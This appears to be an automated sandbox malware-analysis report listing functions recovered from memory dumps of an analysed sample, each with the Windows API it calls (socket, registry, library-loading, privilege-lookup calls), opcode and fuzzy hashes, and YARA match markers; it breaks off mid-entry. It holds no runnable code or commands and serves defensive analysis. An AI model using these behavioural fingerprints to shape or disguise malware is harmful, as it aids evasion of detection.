API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: b9051661889597b37d23cce637b5203b121c1a0cb26c5429ef4bfd25d053eee6
Instruction ID: 881abfb8a7a6976d5ecb82aae5ea527eea1cf883b072fbdedee0dfad95e71ff2
Opcode Fuzzy Hash: b9051661889597b37d23cce637b5203b121c1a0cb26c5429ef4bfd25d053eee6
Instruction Fuzzy Hash: 9D31B47140D3C06FD7128B358C55B66BFB4EF47610F1985DBD9C48F1A3D229A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0135112E, Relevance: 1.6, APIs: 1, Instructions: 82threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 01351171

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: e09b53a01d492ae04acd713a2a509e3067995304cef4ce124067dba07a75782f
Instruction ID: acbeb80d352c89b6e82f29c0491f030677a557547e1950eadf51b24f7d7c0256
Opcode Fuzzy Hash: e09b53a01d492ae04acd713a2a509e3067995304cef4ce124067dba07a75782f
Instruction Fuzzy Hash: 311136702403056FEB249F1CCDD0F8A3766EF56768F2543A5DD55872E1E775C882C621

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 1DECB5EE

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: d555ae40d8a6da65e73a7a41328e3a3154392f2f7f9834c5a61d2331359c48af
Instruction ID: fe2a343a768a87cac3ec1a2e5a8a3e0670b00de63a823cb94ac33c3e60aa51dc
Opcode Fuzzy Hash: d555ae40d8a6da65e73a7a41328e3a3154392f2f7f9834c5a61d2331359c48af
Instruction Fuzzy Hash: D721D371549384AFEB12CB25DC44F66BFACEF46310F0884AAE944DB252D664E908CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1DECB6FA

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 19331fc2defcf83425c6da79384bb125ddace22a53d12eb881e0e5285d4537ab
Instruction ID: 0e07b2288f18a9623e86ffc1dc873adb894e56cf71d66c7b2399d775bdec72e0
Opcode Fuzzy Hash: 19331fc2defcf83425c6da79384bb125ddace22a53d12eb881e0e5285d4537ab
Instruction Fuzzy Hash: 1221B1714093C0AFD712CB65CC55B66BFB4EF87610F0984DBD9848F1A3D224A909C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 208C25E8, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2671

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: fc8160701bbd147ef3bbb9cc5e11aa88e619bbf53cda7e7a1e80ccfccccd9f65
Instruction ID: 87709f339f13d236e784060de563874afa9015b3d47f74e2c80610cfef483ca8
Opcode Fuzzy Hash: fc8160701bbd147ef3bbb9cc5e11aa88e619bbf53cda7e7a1e80ccfccccd9f65
Instruction Fuzzy Hash: 0F21D671105344AFE712CF64DC44F67BFB8EF46310F08849AEA459B292D234E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 208C2504, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2598

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: cf62df46b2fe6d3af2678fc62514f94368348f2a000d90dd98f13846be72652c
Instruction ID: 232e177abf65d48489948b65d79d8d1bc0a66003384c76f6e587954a01a3ab91
Opcode Fuzzy Hash: cf62df46b2fe6d3af2678fc62514f94368348f2a000d90dd98f13846be72652c
Instruction Fuzzy Hash: 1B21F4B1405344AFE712CB54DC41F57BFB8EF42720F19819AEA449F193D334A905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C0D40, Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C0DD5

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 7854d8116dbfa4febac19247347a891271dce3c0219aaf89cdc735e9d7d5d2e6
Instruction ID: d253d0955d0a25b81eca079fc4b15958d1e9a8c3ad585ab0303a186d57bfbe9e
Opcode Fuzzy Hash: 7854d8116dbfa4febac19247347a891271dce3c0219aaf89cdc735e9d7d5d2e6
Instruction Fuzzy Hash: 772130B5409384AFE712CB65DC40F63BFB8EF46720F1880DBEA859B153D224A905CB71

Uniqueness

Uniqueness Score: -1.00%

Function 208C10E0, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 208C1186

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 841e8d11d2926da4b48c2b4f318bb265375d52250b4eb9ac41ae78d34e8618cc
Instruction ID: fcf68adedc3d5d14f4a3352c2d12998d25077997bd0858c4129fa32ed5dfc8e0
Opcode Fuzzy Hash: 841e8d11d2926da4b48c2b4f318bb265375d52250b4eb9ac41ae78d34e8618cc
Instruction Fuzzy Hash: 9421A36540E3C06FC3038B358C55B12BFB4EF87610F1E80DFD8848B2A3D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 208C2076, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 208C2101

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 3c9d1070968a89315f8a6d7fd4dfe1da1dacbf12d84c84265044e1a28542abf7
Instruction ID: fdeeb08040ff3fb37f5ddd98fe3a155eb32216e4eaef6c44eb1acbf68e8aa1a3
Opcode Fuzzy Hash: 3c9d1070968a89315f8a6d7fd4dfe1da1dacbf12d84c84265044e1a28542abf7
Instruction Fuzzy Hash: C121A3B1505340AFE711CB65DC45F56FFF8EF45610F0884AEEA849B292D375E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 208C1EE6, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000EB4), ref: 208C1F57

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 0bf0b98dc18925dc5562bb46efb966013b13f246878c6d0ac1202e5b0afc4dc7
Instruction ID: 109f980ab08d18b6ebc2d939a324e6c009963927cc1ab2ef079dca156e36e0a4
Opcode Fuzzy Hash: 0bf0b98dc18925dc5562bb46efb966013b13f246878c6d0ac1202e5b0afc4dc7
Instruction Fuzzy Hash: 9E216F71500204AFEB109B69DC85F6BBBACEF45720F14856AEE44DB242D774E9098B71

Uniqueness

Uniqueness Score: -1.00%

Function 208C04F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 208C058B

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 60437f7970822e41419ae845fde5e76dfb2ece379f33c8c0e9b9429c8ee9ada5
Instruction ID: 8803e273121881deab81e3b4639372cc3eef473a80295e67b41f50f6f26fbb38
Opcode Fuzzy Hash: 60437f7970822e41419ae845fde5e76dfb2ece379f33c8c0e9b9429c8ee9ada5
Instruction Fuzzy Hash: 4521C571009340AFE7128B24DC45F96BFB8DF46324F1880DAEA84AF193D269A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C0C6A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 208C0CE9

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 456659390d1d74d9eb42a371205ec75d806f9dba0fe4ed1f5de8eaf486ff4b91
Instruction ID: faa8fd477a5c35f002e509c179e7174c6d8c31f7abbc50b49f75dc87da89dd95
Opcode Fuzzy Hash: 456659390d1d74d9eb42a371205ec75d806f9dba0fe4ed1f5de8eaf486ff4b91
Instruction Fuzzy Hash: 65217A71500304EFEB21DFA5DC84B67FBE8EF08210F148569EA859B252E375E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1DECB35E

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 97532d72c134d2fceafbdca7a712d655d7a35e6b531f9be831fd1be658f60f7f
Instruction ID: 2e34afefd7edf3ba17e6f38b361881e95fac180042b9a7d415c82120c40732c0
Opcode Fuzzy Hash: 97532d72c134d2fceafbdca7a712d655d7a35e6b531f9be831fd1be658f60f7f
Instruction Fuzzy Hash: 3F21D7755093C06FD3138B25DC51B62BFB4EF87A10F0A81DFE9848B693D225A919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 208C0E10, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C0EA1

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 39fbe9a5b0ed4fe2fa7ca3cedd323e5f208e9c28a8cd7f56566998141738fb8a
Instruction ID: eb3ba93e92d1bc11d99f85c487c44153455ebc4f941238c9aec3c8a3a2872f67
Opcode Fuzzy Hash: 39fbe9a5b0ed4fe2fa7ca3cedd323e5f208e9c28a8cd7f56566998141738fb8a
Instruction Fuzzy Hash: 9C219071409384AFE7228B65DC44F66BFB8EF46314F08849BEA849B153C224A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 208C2A3A, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2AC3

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: c2a2340ad60ecd67d5e3a10ab6d5cfcc7829c9912b58c50daa33763ac74d1360
Instruction ID: d467cb85141fac0e4e61d9b25ed221b3b11c0d0a53241a4a97f61c1e06fdcbdf
Opcode Fuzzy Hash: c2a2340ad60ecd67d5e3a10ab6d5cfcc7829c9912b58c50daa33763ac74d1360
Instruction Fuzzy Hash: 44217171409384AFE7128F65DC84F96BFB8EF46310F1884DBEA849F193D264A909C762

Uniqueness

Uniqueness Score: -1.00%

Function 1DECA90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DECA989

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d7f542eac3e3716f761d9344a0a11842f730dc842bb4e94450e390b5da9b94e9
Instruction ID: 126d8954b657f61e5370bb178b999159a098cf584441f29404cb8de487768d64
Opcode Fuzzy Hash: d7f542eac3e3716f761d9344a0a11842f730dc842bb4e94450e390b5da9b94e9
Instruction Fuzzy Hash: 8921D172500704AFEB219B28DD45F6BFBECEF08711F04856AEE48AB241D620E5088A72

Uniqueness

Uniqueness Score: -1.00%

Function 208C2DD4, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2E69

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 946b0b2bc37f8496f9049ff7de334fffbb4cd5f06d9df75221c1ec34fcfdce22
Instruction ID: 184cd3a49eea9f96c7d8fdeaf070b17b7625a5b101decec9faa61d6f8d0e334c
Opcode Fuzzy Hash: 946b0b2bc37f8496f9049ff7de334fffbb4cd5f06d9df75221c1ec34fcfdce22
Instruction Fuzzy Hash: EB21B671409384AFE7128B25DC45FA7BFB8EF46310F09849BEA845B163D265A908CB72

Uniqueness

Uniqueness Score: -1.00%

Function 208C11D2, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 208C1246

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: aad0a28a912ad651fc3ff497e991c02c08f7b5f712c9771c1232348cff956598
Instruction ID: f2d41f582e2e9a404f06ec655524d282fcab3364fb2c25a97a3b59f7082b9c04
Opcode Fuzzy Hash: aad0a28a912ad651fc3ff497e991c02c08f7b5f712c9771c1232348cff956598
Instruction Fuzzy Hash: BC219D72500304AFEB20DF69DC85F6BBBA8EF55710F14846AEE44DB242D274E9088B71

Uniqueness

Uniqueness Score: -1.00%

Function 208C2D06, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2D8A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: de07148cfffec9772d46159319c8e07aacaecd8264b48c1505715391e42081e4
Instruction ID: dc5ede2349e35405d461b57d73da5ff4c0e87f721bbcdbcfcf8771b10da934b3
Opcode Fuzzy Hash: de07148cfffec9772d46159319c8e07aacaecd8264b48c1505715391e42081e4
Instruction Fuzzy Hash: 0C2162B2405344AFE712CB65DC44F97BFACEF45310F1884ABEA459B152D274E908CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 208C243A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 208C24AD

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 5878ec8cf82638dcfc8a0806db0a936fd0fe2454642b1cc46a1abc7d5fe80a67
Instruction ID: ee58b3a4f3763cfe3bf5feac5d13b92522e9b8d8a3f576b4a5dcf31142649766
Opcode Fuzzy Hash: 5878ec8cf82638dcfc8a0806db0a936fd0fe2454642b1cc46a1abc7d5fe80a67
Instruction Fuzzy Hash: 7B217C71600204EFE714DF69DC85F67FBE8EF44610F14846AEE489B282D374E904CA66

Uniqueness

Uniqueness Score: -1.00%

Function 208C2B46, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2BC1

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 61f83e2dc28b474294b68b4692869888f24e3bb2ac27291282eea75d09c8446e
Instruction ID: c2751da242bcb9fc52a5d9dd427736a1d709f4dcf777e4065c1ba7129230b4fe
Opcode Fuzzy Hash: 61f83e2dc28b474294b68b4692869888f24e3bb2ac27291282eea75d09c8446e
Instruction Fuzzy Hash: D1217C75100604EFEB218F55DC84FA7BBF8EF08720F1485AAEE459B252D274E904DB72

Uniqueness

Uniqueness Score: -1.00%

Function 1DECACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1DECAD6A

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1d6d3a85373305d0ec325f8338d3d3ad55a98d695703513957dfbff7760137c9
Instruction ID: f10da4eacd1d308be19d7345ad7d7fbedcc0d24a6777d0bc8379e78e2e6fea10
Opcode Fuzzy Hash: 1d6d3a85373305d0ec325f8338d3d3ad55a98d695703513957dfbff7760137c9
Instruction Fuzzy Hash: AC21AFB25093805FD7128B65DC85B92BFE8AF02215F0980EAD984DB263E234D808C762

Uniqueness

Uniqueness Score: -1.00%

Function 208C2EA6, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 208C2F2A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 64422016ed15fb09392a8b9fe277213fca4109dc2460c2974c08641b3b082318
Instruction ID: 4861faaefef34290ff6b2cee36fa03257911347da1771e32538fc26634450081
Opcode Fuzzy Hash: 64422016ed15fb09392a8b9fe277213fca4109dc2460c2974c08641b3b082318
Instruction Fuzzy Hash: DB2190754093849FDB22CF65DC84B92FFF4EF06210F0984DEE9858B163D275A909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C12DE, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C1350

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a4f85c8b4f96897942ccef8aac01b7e4f291224754bab4ec576bd4d241be652b
Instruction ID: 85766bf4db44d94ce2ec7dca1250937ceac818d209ee71942c21448d4e43c74a
Opcode Fuzzy Hash: a4f85c8b4f96897942ccef8aac01b7e4f291224754bab4ec576bd4d241be652b
Instruction Fuzzy Hash: 67218CB1500204EFEB21CF65DC84FA7BBE8EF45310F14846AEE459B652D678E9088B71

Uniqueness

Uniqueness Score: -1.00%

Function 1DECAA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 1DECAA8C

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 952c3b8a51ef70aecb5e3b212a4277f784112be0d7f934cd1862a4699639f3d1
Instruction ID: dfb996cbce8d1aa628181bbf4488ba295bdb8cf47667611c2495109cc64e4e82
Opcode Fuzzy Hash: 952c3b8a51ef70aecb5e3b212a4277f784112be0d7f934cd1862a4699639f3d1
Instruction Fuzzy Hash: 88219371500A04AFE721CF15DE84F67BBECEF04711F04845AEA499B251D764E908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 208C2096, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 208C2101

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: ab12e3a44c9c0faf855607e80e579bab03b1f519a8b0d26d14a7b6643906830c
Instruction ID: cc2ab40dc7a9671b717ed1d9c9eb1ab0ecbd3175ab69f3ce0cc698f170e08387
Opcode Fuzzy Hash: ab12e3a44c9c0faf855607e80e579bab03b1f519a8b0d26d14a7b6643906830c
Instruction Fuzzy Hash: 0F21AE71500204EFE711DF69DC85B67FBE8EF04720F18846AEE849B282D375E905CA72

Uniqueness

Uniqueness Score: -1.00%

Function 208C1BA3, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 208C1C20

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 441991fcb2126b132f17fc6a09e6baad2369b26cf48f664df36176c43cd1073a
Instruction ID: a314464857629d7d2e424e9321ba4b2d817daec775d77989e0e288e6ec6e539d
Opcode Fuzzy Hash: 441991fcb2126b132f17fc6a09e6baad2369b26cf48f664df36176c43cd1073a
Instruction Fuzzy Hash: 7621AC710093C0AFDB128F65DC44A92BFB4EF17320F1985DAE9848F163C335A949DB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C18DB, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C195C

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: d2c9eecdcbe106bc1ff4101f48f8c5b95fa6971da146005e47f79543f6b47cc2
Instruction ID: 53ef3b3580a685aaf246468ce57be249178687dd1b08f274d027fd0a140eb433
Opcode Fuzzy Hash: d2c9eecdcbe106bc1ff4101f48f8c5b95fa6971da146005e47f79543f6b47cc2
Instruction Fuzzy Hash: 8C21A571409384AFE712CB15DC44F66FFB8EF46310F1884DAEA849B153D265A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 208C2196, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 208C220A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 9eb69bb41ae71836223c38592096a33609b6d889afd81e2680917dedec252ad1
Instruction ID: 108d6c7e06b5c6b38265bd2903ff06e65dc791e5e1ca92a269668ee2ae039a9e
Opcode Fuzzy Hash: 9eb69bb41ae71836223c38592096a33609b6d889afd81e2680917dedec252ad1
Instruction Fuzzy Hash: 4F21AE71500204EFE721CF55DC84F96FBE8EF08720F148459EA849B292D375E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 208C1ADE, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 208C1B4A

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 09e5560839378b05e47515a467495970cdaa6adad323bc9f6fc35eed3cda9e70
Instruction ID: c4cc292aebea1b39891d42b9156fccd5ac5dfc71a5f393e5f119dfed51139691
Opcode Fuzzy Hash: 09e5560839378b05e47515a467495970cdaa6adad323bc9f6fc35eed3cda9e70
Instruction Fuzzy Hash: F6219D71504204EFEB21DF65DC85F66FBE8EF09320F14846AEA849B252D375A909CF61

Uniqueness

Uniqueness Score: -1.00%

Function 1DECB58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 1DECB5EE

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: a9ed42e96a196c261a1cd3d88c0214905126396b46f20b132227fd9308ac356e
Instruction ID: b33da87d0cf7dc73f9a390be1a2f0c995633e19ef37a0c76a937ea0ba0edc1af
Opcode Fuzzy Hash: a9ed42e96a196c261a1cd3d88c0214905126396b46f20b132227fd9308ac356e
Instruction Fuzzy Hash: 2311B171500204AFEB11CF29DD84F6BBBE8EF44711F14846AEE48DB251D674E8048BB2

Uniqueness

Uniqueness Score: -1.00%

Function 01352B1B, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,0135303C,01351355,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 01352A16

Memory Dump Source

Source File: 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp, Offset: 01351000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f259a88c36f647dfeddc2071dc02e497d82ae113bfc4b1118b701789c168ee82
Instruction ID: 6a6b58937bea281a53902885f881457543c1a619bc026d1cfd7ed0f0326ae869
Opcode Fuzzy Hash: f259a88c36f647dfeddc2071dc02e497d82ae113bfc4b1118b701789c168ee82
Instruction Fuzzy Hash: 4401B5B151035FEAEFBB3E6C68B0FBB21A6CF12EACFE0503DFC8782106865544995542

Uniqueness

Uniqueness Score: -1.00%

Function 1DECAAFB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1DECAB7E

Memory Dump Source

Source File: 00000016.00000002.734429268.000000001DECA000.00000040.00000001.sdmp, Offset: 1DECA000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: c35fc7cde569039cd8d214196337499dc44456d0eb475dd400efc3f039a1215c
Instruction ID: b48f580b170e20f776a2eada8fe040b64a3dc2752f7e78f87c8284e9dc0a8fbd
Opcode Fuzzy Hash: c35fc7cde569039cd8d214196337499dc44456d0eb475dd400efc3f039a1215c
Instruction Fuzzy Hash: 7911B4725053806FD312CB16CC41F72BFB8EF87A20F19819AED848B652D225B915CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 208C1DFA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C1E6C

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: b925526496564efdae4bdda74dd868c3e36e6894db0d52ed90b7dce3f71e5b16
Instruction ID: 40ad538fe7d2db464102d04e2c921158a23215ae85e52003f5813c87aa315684
Opcode Fuzzy Hash: b925526496564efdae4bdda74dd868c3e36e6894db0d52ed90b7dce3f71e5b16
Instruction Fuzzy Hash: A311AC71500204EEEB21CF99DC84F67BBE8EF19320F14845AEE45DB252D764E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 208C2612, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,F0CD05F7,00000000,00000000,00000000,00000000), ref: 208C2671

Memory Dump Source

Source File: 00000016.00000002.736138743.00000000208C0000.00000040.00000001.sdmp, Offset: 208C0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 5a1b36cbe0ffbaf196ecba4db468d07951f071d0842d19e73869fd72a2fb64cf
